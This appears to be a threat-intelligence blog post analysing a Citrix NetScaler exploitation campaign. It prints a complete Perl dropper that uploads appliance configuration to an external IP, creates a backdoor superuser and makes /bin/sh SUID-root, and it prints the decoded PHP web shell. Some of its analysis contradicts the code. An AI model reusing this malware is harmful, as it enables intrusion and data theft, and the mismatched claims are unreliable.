Tags:

CITRIX 0-DAY EXPLOITS: CVE-2026–88771 & CVE-2026–88772 IN THE WILD

NOTE: This is an analysis of the artifacts and samples found during the hunt of SLAPSHOT, WHIPSHOT which is a Python tunneler used to proxy traffic into internal networks. The analysis is done using various AI Models and if you find any irrelevancy, please do report directly. This article is intended for Network Defenders, Threat Analysts, SOC and IT Administrators.

INDEX

  • INTRODUCTION
  • HOW IT IS CAUSED?
  • CHAINING BOTH EXPLOITS
  • SLAPSHOT: INTO THE PYTHON TUNNEL
  • WHIPSHOT
  • PLATYPUS AGENT
  • PITBOSS SHELL
  • THREAT INTELLIGENCE
  • ATTACKERS ITW (IN THE WILD)
  • HOW ATTACKERS TARGET POTENTIAL VICTIMS?
  • PATCH ASAP
  • CONCLUSION
  • IOCs

INTRODUCTION

After observation of Active Exploitation of a 0-Day Vulnerability present in Citrix Netscalar ADC and Gateway, Citrix officially released the vulnerability details on September 27, 2026 on their Security Bulletin. 8 CVEs are assigned, however only 2 were exploited In The Wild. A CVSS Score of 9.5, which is too critical at this point. 

Attackers Exploit In the Wild | Source: Vecteezy, Edit: Self
  • CVE-2026–88771: Unauthenticated RCE due to improper input validation
  • CVE-2026–88772: Memory overflow leading to RCE or DoS
  • CVE-2026–88773: HTTP Request Smuggling
  • CVE-2026–88774: Feature policy bypass due to improper HTTP URL-based expression usage
  • CVE-2026–88775: Memory overflow leading to unpredictable/erroneous behavior or DoS
  • CVE-2026–88776: Memory overflow leading to unpredictable/erroneous behavior or DoS
  • CVE-2026–88777: Memory overflow leading to unpredictable/erroneous behavior or DoS
  • CVE-2026–88778: TCP Initial Sequence Number (ISN) prediction

Out of these, CVE-2026–88771 and CVE-2026–88772 were exploited in the wild. These are not direct attack, but requires multi-stage attack chain for successful exploitation. 

  • CVE-2026–88771: An attacker can exploit this input validation bug directly through standard web or authentication endpoints. It does not require any network memory overflow or DTLS connection to succeed.
  • CVE-2026–88772: An attacker can target this memory buffer flaw over UDP to run code or crash the system without needing to touch the system log files or maintenance scripts.

HOW IT IS CAUSED?

STAGE 1: INITIAL ACCESS

Two parallel entry points (both lead to root):

Most common observed path:

  1. Attacker sends crafted requests (often via authentication endpoints like /nf/auth/doAuthentication.do).
  2. Malicious strings are written into NetScaler logs.
  3. The internal maintenance script ns_monuploadd_err.pl later processes those logs.
  4. Due to improper input validation, the script executes attacker-controlled commands as root.

STAGE 2: PRIVILEGE & PERSISTENCE

Once root is obtained, attackers typically run a post-exploitation script that:

  1. Creates a rogue superuser account (sec_monitor)

2. Sets SUID bit on /bin/sh (chmod 6555 /bin/sh)

3. Exfiltrates /flash/nsconfig (contains certificates, passwords, configs)

4. Modifies /etc/httpd.conf to treat non-script files (.deb, .sig, .ico, .local_journal) as PHP

STAGE 3: WEB SHELL & TUNNEL DEPLOYMENT

Attackers drop multiple tools for long-term access:

Web shells are usually accessible via legitimate-looking URLs such as:

/logon/LogonPoint/css/LogonUISimple.html.style.min.css

STAGE 4: POST-COMPROMISE ACTIVITY

  1. Internal reconnaissance

2. Credential theft

3. Lateral movement into the internal network (using the NetScaler’s IP as source)

4. Further tooling (Chisel, Sliver, etc.)

ATTACK FLOW SUMMARY

Unauthenticated Attacker
↓
CVE-2026–88772 (DTLS overflow) or CVE-2026–88771 (Log → Root)
↓
Root Shell on NetScaler
↓
Create backdoor user + SUID /bin/sh + Exfil config
↓
Deploy Web Shells (WHIPSHOT / .local_journal) + Tunnelers (SLAPSHOT / Platypus)
↓
Persistent Access + Internal Pivot

CHAINING BOTH EXPLOITS

Why Attackers Used Them Together:-

➼ Backup Options: Hackers use two different bugs at the same time so they have a backup plan if one entry point fails or gets blocked by security tools
➼ Different System Parts: CVE-2026–88771 attacks how the system handles logs and scripts, while CVE-2026–88772 attacks how the system processes network data packets
➼ No Direct Rule: An appliance can be safe from one bug but still vulnerable to the other depending on its settings and configuration

SLAPSHOT: INTO THE PYTHON TUNNEL 

Slapshot is a Post-Exploitation implant / backdoor installer specifically built for compromised Citrix NetScaler ADC/Gateway appliances. It is the 2nd-stage implant that gets dropped after an attacker has already obtained root via CVE-2026–88771 or CVE-2026–88772.

Code Snippet from Slapshot Sample

During my investigation, 24 samples of Slapshot are found and extracted the vital path to make a YARA Detection Rule, included at the End of this Article. 

It turns a NetScaler that already has root into a stealthy pivot point:

  • Drops a local TCP session manager (the core of SLAPSHOT) that listens only on loopback
  • Lets a remote operator open arbitrary outbound TCP connections from the NetScaler itself
  • Because the connections originate from the appliance’s own NSIP/SNIP, they look like ordinary ADC traffic on the wire
  • Places disguised web-shell receivers in the LogonPoint custom directory so the operator can talk to the local agent over HTTP
  • Touches httpd.conf (with a backup) for persistence / handler changes so non-script extensions can be treated as PHP

COMPONENT BREAKDOWN

While analyzing the Slapshot Code, came across few components used in the codebase. 

➼ agent.pl (Perl) — Local loopback TCP multiplexer. Supports open host:port, push/pull/exch (base64 data), close, ping. Sessions are kept in memory; data is base64-encoded over the local socket.

➼ bridge.pl — Tiny client that reads the port from /tmp/.uxdport and forwards a single base64 command to the agent.

➼ slapshot.py (Python 3) — More complete, multi-threaded reimplementation of the same protocol (open / push / pull / exch / close / stat / ping). Explicitly labeled as the SLAPSHOT-analog. Caps sessions, handles timeouts, coalesces reads, etc.

➼ The rest of the (truncated) script almost certainly continues with:

1) Dropping the PHP web shells (gated on the hardcoded token in cookies/headers)

2) Appending persistence to rc.netscaler / crontab

3) Modifying httpd.conf so .deb (and similar) files are executed as PHP

4) Possibly collecting and exfiltrating config, backups, and diagnostics to the hardcoded IP

WHIPSHOT

WHIPSHOT is a custom PHP web shell used in the 2026 Citrix NetScaler exploitation campaign (CVE-2026–88771 / CVE-2026–88772).

  • Disguised appearance: Frequently dropped as non-PHP files such as .deb, .sig, .ico, or hidden files like .ctxs.receiver / .local_journal.
  • Stealthy delivery: Attackers modify httpd.conf so the web server treats these non-script extensions as executable PHP.
  • Access method: Commonly reachable via legitimate-looking paths (e.g. fake CSS URLs under /logon/LogonPoint/).

Capabilities:

Remote command execution

File upload / download

Acts as a bridge to launch or communicate with SLAPSHOT

Authentication: Some variants are password-protected (SHA-256 hashed passwords observed).

It is often deployed as:-

Unauthenticated Attacker
↓
CVE-2026–88772 (DTLS overflow) or CVE-2026–88771 (Log → Root)
↓
Root Shell on NetScaler
↓
Modifies httpd.conf to enable PHP execution on non-standard extensions
↓
Deploy WHIPSHOT to: /var/netscaler/logon/LogonPoint/custom/, /vpn/scripts/linux/

PLATYPUS AGENT

Platypus is typically used when the attacker wants a more robust, full-featured C2 channel instead of (or in addition to) a simple web shell + tunneler.

In our hunt, we have identified Platypus agent in the domain entretiensol.com. Some of the communicating files with this domain is a Platypus agent. 

Attackers in this campaign used multiple tools in parallel. Platypus was one of the options for establishing stronger, longer-term control over the compromised appliance.

PITBOSS SHELL: BLINDING THE SERVICE

pitboss is an internal system daemon or watchdog process responsible for monitoring the health and availability of the NetScaler Packet Processing Engine in Citrix NetScaler.

NOTE: Generally, if an exploit payload causes a crash, the real “pitboss” watchdog immediately reboots the entire appliance — wiping out the attacker’s memory-resident shellcode.

To bypass this, advanced attackers write custom shellcode that actively disables the real pitboss monitoring loops by neutralizing system signals (like SIGSEGV or SIGBUS), forcing the system to merely respawn the process rather than rebooting, thereby preserving the web shell.

Here are the technical breakdowns of the same, which is written in Perl:-

MD5: bb724df37959c23a4ce6b5c5c374217e
SHA-1: fae85e4e10dda2f25cd023bf8e2e61432d33a7f5
SHA-256: 974b69782fdf5d67b97cfd508465939e44ee10798dbcc1e82b92d78776bad938

#!/usr/bin/perl
use strict;
use warnings;
use strict; use warnings;
use Digest::SHA qw(hmac_sha256);
use MIME::Base64;
use Digest::SHA qw(sha256_hex);
my $user = 'sec_monitor';
my $pass = 'ay#39&RGYvv4Xuzy';
my $nsconf = '/flash/nsconfig/ns.conf';
my $WS_FILE = '/var/netscaler/logon/LogonPoint/.local_journal';
my $HTTPD = '/etc/httpd.conf';
my $ws_pass = 'QI@UEG5PC7oRt31E';
my $ws_hash = sha256_hex($ws_pass);
sub pbkdf2 {
my ($pw, $salt) = @_;
my $u = hmac_sha256($salt . pack('N', 1), $pw);
my $t = $u;
for (2 .. 2500) { $u = hmac_sha256($u, $pw); $t ^= $u }
substr($t, 0, 32);
}
open my $r, '<:raw', '/dev/urandom' or die "urandom: $!";
read $r, my $salt, 32; close $r;
my $hash = '5' . unpack('H*', $salt) . unpack('H*', pbkdf2($pass, $salt));
my @lines;
my $removed = 0;
if (open my $cf, '<', $nsconf) {
while (<$cf>) {
if (/^(add|set|bind)\s+system\s+user\s+\Q$user\E(\s|$)/i) {
$removed++;
next;
}
push @lines, $_;
}
close $cf;
}
open my $fh, '>', $nsconf or die "open $nsconf: $!";
print $fh @lines;
print $fh "add system user $user $hash -encrypted\n";
print $fh "bind system user $user superuser 100\n";
close $fh;
print "removed $removed old line(s) for $user\n" if $removed;
print "done: $user written to $nsconf\n";
print "reboot the appliance to activate.\n";
my $server = '64.94.85.67';
my $port = 443;
my $src_dir = '/flash/nsconfig';
my $tgz = '/tmp/update_result_3567cs.tgz';
my $self = $0;
die "Directory $src_dir not found\n" unless -d $src_dir;
system("tar", "czf", $tgz, "-C", "/flash", "nsconfig") == 0
or die "tar failed: $?\n";
my $url = "http://$server:$port/update_result_3567cs.tgz";
my $rc;
if (system("which curl >/dev/null 2>&1") == 0) {
$rc = system("curl", "-s", "-o", "/dev/null",
"--data-binary", "\@$tgz",
"-H", "Content-Type: application/octet-stream",
$url);
} elsif (system("which wget >/dev/null 2>&1") == 0) {
$rc = system("wget", "-q", "--post-file=$tgz",
"--header=Content-Type: application/octet-stream",
"-O", "/dev/null", $url);
} else {
die "Neither curl nor wget found\n";
}
if ($rc != 0) {
unlink $tgz;
die "Upload failed (exit $rc)\n";
}
unlink $tgz;
unlink $self;
chmod 06555, '/bin/sh';
print "[+] chmod 6555 /bin/sh\n";
system('mkdir', '-p', '/var/netscaler/logon/LogonPoint');
my $ws_b64 = <<'B64';
PD9waHAKJEtFWT0nZTRkOTA5YzI5MGQwZmIxY2EwNjhmZmFkZGYyMmNiZDAnOwpzZXNzaW9uX3N0
YXJ0KCk7CmlmKGlzc2V0KCRfUE9TVFsnayddKSl7aWYoaGFzaCgnc2hhMjU2JywkX1BPU1RbJ2sn
XSk9PT0kS0VZKXskX1NFU1NJT05bJ29rJ109MTt9aGVhZGVyKCdMb2NhdGlvbjonLiRfU0VSVkVS
WydSRVFVRVNUX1VSSSddKTtleGl0O30KaWYoaXNzZXQoJF9HRVRbJ2xvZ291dCddKSl7c2Vzc2lv
bl9kZXN0cm95KCk7aGVhZGVyKCdMb2NhdGlvbjonLnN0cnRvaygkX1NFUlZFUlsnUkVRVUVTVF9V
UkknXSwnPycpKTtleGl0O30KaWYoZW1wdHkoJF9TRVNTSU9OWydvayddKSl7Pz48IWRvY3R5cGUg
aHRtbD48aHRtbD48aGVhZD48dGl0bGU+LjwvdGl0bGU+PHN0eWxlPgpib2R5e2JhY2tncm91bmQ6
IzBkMTExNztkaXNwbGF5OmZsZXg7anVzdGlmeS1jb250ZW50OmNlbnRlcjthbGlnbi1pdGVtczpj
ZW50ZXI7aGVpZ2h0OjEwMHZoO2ZvbnQtZmFtaWx5Om1vbm9zcGFjZX0KZm9ybXtiYWNrZ3JvdW5k
OiMxNjFiMjI7Ym9yZGVyOjFweCBzb2xpZCAjMzAzNjNkO2JvcmRlci1yYWRpdXM6OHB4O3BhZGRp
bmc6MzBweDt0ZXh0LWFsaWduOmNlbnRlcn0KaW5wdXR7YmFja2dyb3VuZDojMGQxMTE3O2NvbG9y
OiMwZjA7Ym9yZGVyOjFweCBzb2xpZCAjMzAzNjNkO3BhZGRpbmc6MTBweDtmb250LWZhbWlseTpp
bmhlcml0O2JvcmRlci1yYWRpdXM6NHB4O3dpZHRoOjI1MHB4fQpidXR0b257YmFja2dyb3VuZDoj
MjM4NjM2O2NvbG9yOiNmZmY7Ym9yZGVyOm5vbmU7cGFkZGluZzo4cHggMjBweDtmb250LWZhbWls
eTppbmhlcml0O2JvcmRlci1yYWRpdXM6NHB4O2N1cnNvcjpwb2ludGVyO21hcmdpbi10b3A6MTBw
eH0KPC9zdHlsZT48L2hlYWQ+PGJvZHk+PGZvcm0gbWV0aG9kPXBvc3Q+PGlucHV0IHR5cGU9cGFz
c3dvcmQgbmFtZT1rIHBsYWNlaG9sZGVyPSJwYXNzd29yZCIgYXV0b2ZvY3VzPjxicj48YnV0dG9u
PkxvZ2luPC9idXR0b24+PC9mb3JtPjwvYm9keT48L2h0bWw+PD9waHAgZXhpdDt9CiRvPScnOwpp
Zihpc3NldCgkX0dFVFsnZGwnXSkmJmlzX2ZpbGUoJF9HRVRbJ2RsJ10pKXtoZWFkZXIoJ0NvbnRl
bnQtRGlzcG9zaXRpb246YXR0YWNobWVudDtmaWxlbmFtZT0iJy5iYXNlbmFtZSgkX0dFVFsnZGwn
XSkuJyInKTtoZWFkZXIoJ0NvbnRlbnQtVHlwZTphcHBsaWNhdGlvbi9vY3RldC1zdHJlYW0nKTty
ZWFkZmlsZSgkX0dFVFsnZGwnXSk7ZXhpdDt9CmlmKGlzc2V0KCRfUE9TVFsnY21kJ10pJiYkX1BP
U1RbJ2NtZCddIT09JycpeyRvPXNoZWxsX2V4ZWMoJF9QT1NUWydjbWQnXS4nIDI+JjEnKT86Jyc7
fQppZihpc3NldCgkX0ZJTEVTWydmJ10pJiYkX0ZJTEVTWydmJ11bJ2Vycm9yJ109PTAmJiRfUE9T
VFsncCddKXttb3ZlX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1snZiddWyd0bXBfbmFtZSddLCRfUE9T
VFsncCddKTskbz0idXBsb2FkZWQgLT4geyRfUE9TVFsncCddfSAoIi5maWxlc2l6ZSgkX1BPU1Rb
J3AnXSkuIiBieXRlcykiO30KPz48IWRvY3R5cGUgaHRtbD48aHRtbD48aGVhZD48dGl0bGU+Ljwv
dGl0bGU+PHN0eWxlPgoqe2JveC1zaXppbmc6Ym9yZGVyLWJveDttYXJnaW46MDtwYWRkaW5nOjB9
CmJvZHl7YmFja2dyb3VuZDojMGQxMTE3O2NvbG9yOiNjOWQxZDk7Zm9udC1mYW1pbHk6J0NvdXJp
ZXIgTmV3Jyxtb25vc3BhY2U7cGFkZGluZzozMHB4fQoucGFuZWx7YmFja2dyb3VuZDojMTYxYjIy
O2JvcmRlcjoxcHggc29saWQgIzMwMzYzZDtib3JkZXItcmFkaXVzOjhweDtwYWRkaW5nOjIwcHg7
bWFyZ2luLWJvdHRvbToyMHB4fQpoM3tjb2xvcjojNThhNmZmO21hcmdpbi1ib3R0b206MTJweDtm
b250LXNpemU6MTRweDt0ZXh0LXRyYW5zZm9ybTp1cHBlcmNhc2U7bGV0dGVyLXNwYWNpbmc6MnB4
fQppbnB1dFt0eXBlPXRleHRde3dpZHRoOjEwMCU7YmFja2dyb3VuZDojMGQxMTE3O2NvbG9yOiMw
ZjA7Ym9yZGVyOjFweCBzb2xpZCAjMzAzNjNkO3BhZGRpbmc6MTBweDtmb250LWZhbWlseTppbmhl
cml0O2ZvbnQtc2l6ZToxNHB4O2JvcmRlci1yYWRpdXM6NHB4fQp0ZXh0YXJlYXt3aWR0aDoxMDAl
O2JhY2tncm91bmQ6IzBkMTExNztjb2xvcjojOGI5NDllO2JvcmRlcjoxcHggc29saWQgIzMwMzYz
ZDtwYWRkaW5nOjEwcHg7Zm9udC1mYW1pbHk6aW5oZXJpdDtmb250LXNpemU6MTNweDtib3JkZXIt
cmFkaXVzOjRweDtyZXNpemU6dmVydGljYWx9Ci5idG57YmFja2dyb3VuZDojMjM4NjM2O2NvbG9y
OiNmZmY7Ym9yZGVyOm5vbmU7cGFkZGluZzo4cHggMjBweDtmb250LWZhbWlseTppbmhlcml0O2Zv
bnQtc2l6ZToxM3B4O2JvcmRlci1yYWRpdXM6NHB4O2N1cnNvcjpwb2ludGVyO21hcmdpbi10b3A6
MTBweH0KLmJ0bjpob3ZlcntiYWNrZ3JvdW5kOiMyZWEwNDN9Ci5idG4tYmx1ZXtiYWNrZ3JvdW5k
OiMxZjZmZWJ9LmJ0bi1ibHVlOmhvdmVye2JhY2tncm91bmQ6IzM4OGJmZH0KLmJ0bi1wdXJwbGV7
YmFja2dyb3VuZDojODk1N2U1fS5idG4tcHVycGxlOmhvdmVye2JhY2tncm91bmQ6I2EzNzFmN30K
LmJ0bi1yZWR7YmFja2dyb3VuZDojZGEzNjMzO2ZvbnQtc2l6ZToxMXB4O3BhZGRpbmc6NHB4IDEy
cHg7bWFyZ2luOjB9LmJ0bi1yZWQ6aG92ZXJ7YmFja2dyb3VuZDojZjg1MTQ5fQpocntib3JkZXI6
bm9uZTtib3JkZXItdG9wOjFweCBzb2xpZCAjMzAzNjNkO21hcmdpbjoyNXB4IDB9Ci5yb3d7ZGlz
cGxheTpmbGV4O2dhcDoxMHB4O2FsaWduLWl0ZW1zOmNlbnRlcjttYXJnaW4tdG9wOjhweH0KLnJv
dyBpbnB1dFt0eXBlPXRleHRde2ZsZXg6MX0KLmZpbGUtem9uZXtib3JkZXI6MnB4IGRhc2hlZCAj
MzAzNjNkO2JvcmRlci1yYWRpdXM6OHB4O3BhZGRpbmc6MzBweDt0ZXh0LWFsaWduOmNlbnRlcjtt
YXJnaW4tdG9wOjhweDtjdXJzb3I6cG9pbnRlcjt0cmFuc2l0aW9uOmJvcmRlci1jb2xvciAuMnN9
Ci5maWxlLXpvbmU6aG92ZXJ7Ym9yZGVyLWNvbG9yOiM1OGE2ZmZ9Ci5maWxlLXpvbmUgaW5wdXR7
ZGlzcGxheTpub25lfQouZmlsZS16b25lIHNwYW57Y29sb3I6IzhiOTQ5ZX0KLnRvcHtkaXNwbGF5
OmZsZXg7anVzdGlmeS1jb250ZW50OmZsZXgtZW5kO21hcmdpbi1ib3R0b206MTBweH0KbGFiZWx7
Y29sb3I6IzhiOTQ5ZTtmb250LXNpemU6MTJweH0KPC9zdHlsZT48L2hlYWQ+PGJvZHk+CjxkaXYg
Y2xhc3M9InRvcCI+PGEgaHJlZj0iP2xvZ291dCIgY2xhc3M9ImJ0biBidG4tcmVkIj5Mb2dvdXQ8
L2E+PC9kaXY+Cgo8ZGl2IGNsYXNzPSJwYW5lbCI+CjxoMz5jb21tYW5kIGV4ZWN1dGlvbjwvaDM+
Cjxmb3JtIG1ldGhvZD1wb3N0Pgo8aW5wdXQgdHlwZT10ZXh0IG5hbWU9Y21kIHZhbHVlPSI8Pz1o
dG1sc3BlY2lhbGNoYXJzKCRfUE9TVFsnY21kJ10/PycnKT8+IiBwbGFjZWhvbGRlcj0idHlwZSBj
b21tYW5kIGhlcmUuLi4iIGF1dG9mb2N1cz4KPHRleHRhcmVhIHJvd3M9MTYgcmVhZG9ubHk+PD09
aHRtbHNwZWNpYWxjaGFycygkbyk/PjwvdGV4dGFyZWE+CjxidXR0b24gY2xhc3M9ImJ0biIgdHlw
ZT1zdWJtaXQ+RXhlY3V0ZTwvYnV0dG9uPgo8L2Zvcm0+CjwvZGl2PgoKPGhyPgoKPGRpdiBjbGFz
cz0icGFuZWwiPgo8aDM+ZmlsZSB0cmFuc2ZlcjwvaDM+CjxkaXYgc3R5bGU9ImRpc3BsYXk6Zmxl
eDtnYXA6MjBweCI+CjxkaXYgc3R5bGU9ImZsZXg6MSI+CjxsYWJlbD5VcGxvYWQ8L2xhYmVsPgo8
Zm9ybSBtZXRob2Q9cG9zdCBlbmN0eXBlPW11bHRpcGFydC9mb3JtLWRhdGE+CjxkaXYgY2xhc3M9
ImZpbGUtem9uZSIgb25jbGljaz0idGhpcy5xdWVyeVNlbGVjdG9yKCdpbnB1dCcpLmNsaWNrKCki
Pgo8aW5wdXQgdHlwZT1maWxlIG5hbWU9ZiBvbmNoYW5nZT0idGhpcy5wYXJlbnROb2RlLnF1ZXJ5
U2VsZWN0b3IoJ3NwYW4nKS50ZXh0Q29udGVudD10aGlzLmZpbGVzWzBdLm5hbWUiPgo8c3Bhbj5j
bGljayB0byBzZWxlY3QgZmlsZTwvc3Bhbj4KPC9kaXY+CjxkaXYgY2xhc3M9InJvdyI+CjxpbnB1
dCB0eXBlPXRleHQgbmFtZT1wIHBsYWNlaG9sZGVyPSJkZXN0aW5hdGlvbiBwYXRoLCBlLmcuIC90
bXAvcGF5bG9hZC5iaW4iPgo8YnV0dG9uIGNsYXNzPSJidG4gYnRuLWJsdWUiIHR5cGU9c3VibWl0
PlVwbG9hZDwvYnV0dG9uPgo8L2Rpdj4KPC9mb3JtPgo8L2Rpdj4KPGRpdiBzdHlsZT0iZmxleDox
Ij4KPGxhYmVsPkRvd25sb2FkPC9sYWJlbD4KPGZvcm0gbWV0aG9kPWdldD4KPGRpdiBjbGFzcz0i
cm93IiBzdHlsZT0ibWFyZ2luLXRvcDozMHB4Ij4KPGlucHV0IHR5cGU9dGV4dCBuYW1lPWRsIHBs
YWNlaG9sZGVyPSJmaWxlIHBhdGgsIGUuZy4gL2V0Yy9wYXNzd2QiPgo8YnV0dG9uIGNsYXNzPSJi
dG4gYnRuLXB1cnBsZSIgdHlwZT1zdWJtaXQ+RG93bmxvYWQ8L2J1dHRvbj4KPC9kaXY+CjwvZm9y
bT4KPC9kaXY+CjwvZGl2Pgo8L2Rpdj4KCjwvYm9keT48L2h0bWw+Cg==
B64
my $ws_content = decode_base64($ws_b64);
$ws_content =~ s/e4d909c290d0fb1ca068ffaddf22cbd0/$ws_hash/;
open my $fh2, '>', $WS_FILE or die "write $WS_FILE: $!\n";
print $fh2 $ws_content;
close $fh2;
print "[+] webshell -> $WS_FILE\n";
open my $rf, '<', $HTTPD or die "read $HTTPD: $!\n";
my $conf = do { local $/; <$rf> };
close $rf;
if ($conf !~ /local_journal/) {
my $patch = <<'PATCH';
<Files ".local_journal">
SetHandler application/x-httpd-php
Header always set Cache-Control "no-store, no-cache, must-revalidate"
Header always set Pragma "no-cache"
</Files>
Alias /logon/LogonPoint/css/LogonUISimple.html.style.min.css "/var/netscaler/logon/LogonPoint/.local_journal"
AliasMatch ^/logon/LogonPoint/css/LogonUISimple\.html\.style\.min\.[0-9a-f]+\.css$ "/var/netscaler/logon/LogonPoint/.local_journal"
PATCH
$conf =~ s{( Alias /logon/ "/var/netscaler/logon/")}{$patch$1}
or die "could not find Alias /logon/ line\n";
print "[+] injected Files + Alias + AliasMatch\n";
}
# flip php engine on
if ($conf =~ s/php_flag engine off/php_flag engine on/g) {
print "[+] php_flag engine on\n";
}
open my $wf, '>', $HTTPD or die "write $HTTPD: $!\n";
print $wf $conf;
close $wf;
# ---- 4. reload httpd ----
if (open my $pf, '<', '/var/run/httpd.pid') {
chomp(my $pid = <$pf>);
close $pf;
if ($pid =~ /^\d+$/) {
kill 'HUP', $pid;
print "[+] httpd reloaded (HUP -> pid $pid)\n";
}
} else {
print "[!] /var/run/httpd.pid not found\n";
}
# ---- done ----
print "\n";
print "[*] url: https://<NSIP>/logon/LogonPoint/css/LogonUISimple.html.style.min.css\n";
print "[*] pass: $ws_pass\n";

It is a multi-purpose rootkit/persistence installer that performs the following actions once the attacker already has root:

➼ Creates a rogue superuser account

➼ Exfiltrates the entire /flash/nsconfig directory

➼ Sets SUID on /bin/sh

➼ Drops a password-protected PHP web shell

➼ Patches httpd.conf so the web shell is accessible via a legitimate-looking CSS URL

➼ Reloads Apache

DETAILED BREAKDOWN

➼ STAGE 1: Rogue Admin Account
ACTION: Creates user sec_monitor
DETAILS: Hardcoded password: ay#39&RGYvv4Xuzy Uses NetScaler-style PBKDF2 hashing (2500 iterations) and writes it directly into /flash/nsconfig/ns.conf with superuser privileges

➼ STAGE 2: Config Exfiltration
ACTION: Steals full config
DETAILS: Creates a tarball of /flash/nsconfig and uploads it via HTTP POST to 64.94.85.67:443 as update_result_3567cs.tgz

➼ STAGE 3: SUID Backdoor
ACTION: chmod 6555 /bin/sh
DETAILS: Makes the system shell SUID-root so any future code execution runs as root

➼ STAGE 4: Web Shell Drop
ACTION: Writes to .local_journal
DETAILS: Drops a full-featured PHP web shell at: /var/netscaler/logon/LogonPoint/.local_journal Password: QI@UEG5PC7oRt31E (SHA-256 hashed inside the shell).

➼ STAGE 5: httpd.conf Patch
ACTION: Makes the shell accessible
DETAILS: Injects <Files> Alias, and AliasMatch rules so the web shell is reachable at a legitimate-looking CSS path: /logon/LogonPoint/css/LogonUISimple.html.style.min.css (and also via hashed CSS filenames). Also forces php_flag engine on.

➼ STAGE 6: Cleanup & Reload
ACTION: Self-deletes + reloads Apache
DETAILS: Deletes itself and sends HUP to httpd so the new configuration takes effect immediately

In this there is a Base 64 Encoded String which can be decoded as:-

<?php
$KEY='e4d909c290d0fb1ca068ffaddf22cbd0';
session_start();
if(isset($_POST['k'])){if(hash('sha256',$_POST['k'])===$KEY){$_SESSION['ok']=1;}header('Location:'.$_SERVER['REQUEST_URI']);exit;}
if(isset($_GET['logout'])){session_destroy();header('Location:'.strtok($_SERVER['REQUEST_URI'],'?'));exit;}
if(empty($_SESSION['ok'])){?><!doctype html><html><head><title>.</title><style>
body{background:#0d1117;display:flex;justify-content:center;align-items:center;height:100vh;font-family:monospace}
form{background:#161b22;border:1px solid #30363d;border-radius:8px;padding:30px;text-align:center}
input{background:#0d1117;color:#0f0;border:1px solid #30363d;padding:10px;font-family:inherit;border-radius:4px;width:250px}
button{background:#238636;color:#fff;border:none;padding:8px 20px;font-family:inherit;border-radius:4px;cursor:pointer;margin-top:10px}
</style></head><body><form method=post><input type=password name=k placeholder="password" autofocus><br><button>Login</button></form></body></html><?php exit;}
$o='';
if(isset($_GET['dl'])&&is_file($_GET['dl'])){header('Content-Disposition:attachment;filename="'.basename($_GET['dl']).'"');header('Content-Type:application/octet-stream');readfile($_GET['dl']);exit;}
if(isset($_POST['cmd'])&&$_POST['cmd']!==''){$o=shell_exec($_POST['cmd'].' 2>&1')?:'';}
if(isset($_FILES['f'])&&$_FILES['f']['error']==0&&$_POST['p']){move_uploaded_file($_FILES['f']['tmp_name'],$_POST['p']);$o="uploaded -> {$_POST['p']} (".filesize($_POST['p'])." bytes)";}
?><!doctype html><html><head><title>.</title><style>
*{box-sizing:border-box;margin:0;padding:0}
body{background:#0d1117;color:#c9d1d9;font-family:'Courier New',monospace;padding:30px}
.panel{background:#161b22;border:1px solid #30363d;border-radius:8px;padding:20px;margin-bottom:20px}
h3{color:#58a6ff;margin-bottom:12px;font-size:14px;text-transform:uppercase;letter-spacing:2px}
input[type=text]{width:100%;background:#0d1117;color:#0f0;border:1px solid #30363d;padding:10px;font-family:inherit;font-size:14px;border-radius:4px}
textarea{width:100%;background:#0d1117;color:#8b949e;border:1px solid #30363d;padding:10px;font-family:inherit;font-size:13px;border-radius:4px;resize:vertical}
.btn{background:#238636;color:#fff;border:none;padding:8px 20px;font-family:inherit;font-size:13px;border-radius:4px;cursor:pointer;margin-top:10px}
.btn:hover{background:#2ea043}
.btn-blue{background:#1f6feb}.btn-blue:hover{background:#388bfd}
.btn-purple{background:#8957e5}.btn-purple:hover{background:#a371f7}
.btn-red{background:#da3633;font-size:11px;padding:4px 12px;margin:0}.btn-red:hover{background:#f85149}
hr{border:none;border-top:1px solid #30363d;margin:25px 0}
.row{display:flex;gap:10px;align-items:center;margin-top:8px}
.row input[type=text]{flex:1}
.file-zone{border:2px dashed #30363d;border-radius:8px;padding:30px;text-align:center;margin-top:8px;cursor:pointer;transition:border-color .2s}
.file-zone:hover{border-color:#58a6ff}
.file-zone input{display:none}
.file-zone span{color:#8b949e}
.top{display:flex;justify-content:flex-end;margin-bottom:10px}
label{color:#8b949e;font-size:12px}
</style></head><body>
<div class="top"><a href="?logout" class="btn btn-red">Logout</a></div><div class="panel">
<h3>command execution</h3>
<form method=post>
<input type=text name=cmd value="<?=htmlspecialchars($_POST['cmd']??'')?>" placeholder="type command here..." autofocus>
<textarea rows=16 readonly><==htmlspecialchars($o)?></textarea>
<button class="btn" type=submit>Execute</button>
</form>
</div>
<hr>
<div class="panel">
<h3>file transfer</h3>
<div style="display:flex;gap:20px">
<div style="flex:1">
<label>Upload</label>
<form method=post enctype=multipart/form-data>
<div class="file-zone" onclick="this.querySelector('input').click()">
<input type=file name=f onchange="this.parentNode.querySelector('span').textContent=this.files[0].name">
<span>click to select file</span>
</div>
<div class="row">
<input type=text name=p placeholder="destination path, e.g. /tmp/payload.bin">
<button class="btn btn-blue" type=submit>Upload</button>
</div>
</form>
</div>
<div style="flex:1">
<label>Download</label>
<form method=get>
<div class="row" style="margin-top:30px">
<input type=text name=dl placeholder="file path, e.g. /etc/passwd">
<button class="btn btn-purple" type=submit>Download</button>
</div>
</form>
</div>
</div>
</div>
</body></html>

This is a full-featured interactive PHP web shell that was embedded (base64-encoded) inside the Pitboss Shell Perl script.

This is a password-protected, session-based web shell with a clean dark UI. It provides three main capabilities: RCE, File Upload and File Download.

FEATURES

➼ Authentication: Password protected. Uses SHA-256 hash comparison
➼ Hardcoded Hash: e4d909c290d0fb1ca068ffaddf22cbd0
➼ Actual Password: QI@UEG5PC7oRt31E (this is the plaintext that hashes to the above value — taken from the Perl dropper)
➼ Session Handling: Uses PHP sessions ($_SESSION[‘ok’]). Login persists until logout
➼ Command Execution: shell_exec($_POST[‘cmd’] . ‘ 2>&1’) — runs any system command as the web server user (usually root on compromised NetScalers due to SUID /bin/sh)
➼ File Upload: Allows uploading a file to any path the process can write to
➼ File Download: Allows downloading any file by providing its path (?dl=/path/to/file)
➼ UI: Dark GitHub-style interface with monospace font. Looks relatively modern for a web shell

THREAT INTELLIGENCE

The initial anchor point was the IOC present in the Pitscalar, where a domain has been found which is used by threat actors to distribute malware and manage compromised servers.

entretiensol[.]com

